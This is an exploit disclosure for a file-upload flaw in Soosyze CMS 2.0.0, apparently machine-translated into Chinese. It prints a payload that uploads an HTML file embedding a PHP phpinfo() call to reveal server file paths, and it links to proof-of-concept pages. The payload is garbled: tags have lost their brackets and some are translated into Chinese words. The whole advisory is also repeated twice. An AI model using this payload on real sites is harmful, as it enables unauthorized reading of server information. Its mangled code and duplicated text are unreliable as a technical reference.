## title: soosyze 2.0.0-文件上传
##作者: nu11secur1ty
## date: 04.26.2023-08.28.2023
## vendor: https://sooosyze.com/
## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0
##参考: https://portswigger.net/web-security/file-upload
## Description:
损坏的文件上传逻辑。恶意用户可以上传他
想要html文件,当他试图执行它时,他几乎要查看
全部
文件路径。这可能比以往任何时候都更糟,这取决于场景。
状态:高脆弱性
[+] exploit:
````html
!doctype html
html
头
titlehello折断的文件上传逻辑,现在我可以阅读您的特殊
目录拍拍,谢谢;)/标题
/头
身体
H1
php
phpinfo();
?
/H1
/身体
/html
````````
##复制:
[HREF](https://github.com/NU11Secur1ty/cve...main/main/vendors/soosyze/2023/soosyze-2.0.0)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-path-traversal-broken.html)
##时间花费:
01:27:00
##作者: nu11secur1ty
## date: 04.26.2023-08.28.2023
## vendor: https://sooosyze.com/
## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0
##参考: https://portswigger.net/web-security/file-upload
## Description:
损坏的文件上传逻辑。恶意用户可以上传他
想要html文件,当他试图执行它时,他几乎要查看
全部
文件路径。这可能比以往任何时候都更糟,这取决于场景。
状态:高脆弱性
[+] exploit:
````html
!doctype html
html
头
titlehello折断的文件上传逻辑,现在我可以阅读您的特殊
目录拍拍,谢谢;)/标题
/头
身体
H1
php
phpinfo();
?
/H1
/身体
/html
````````
##复制:
[HREF](https://github.com/NU11Secur1ty/cve...main/main/vendors/soosyze/2023/soosyze-2.0.0)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-path-traversal-broken.html)
##时间花费:
01:27:00
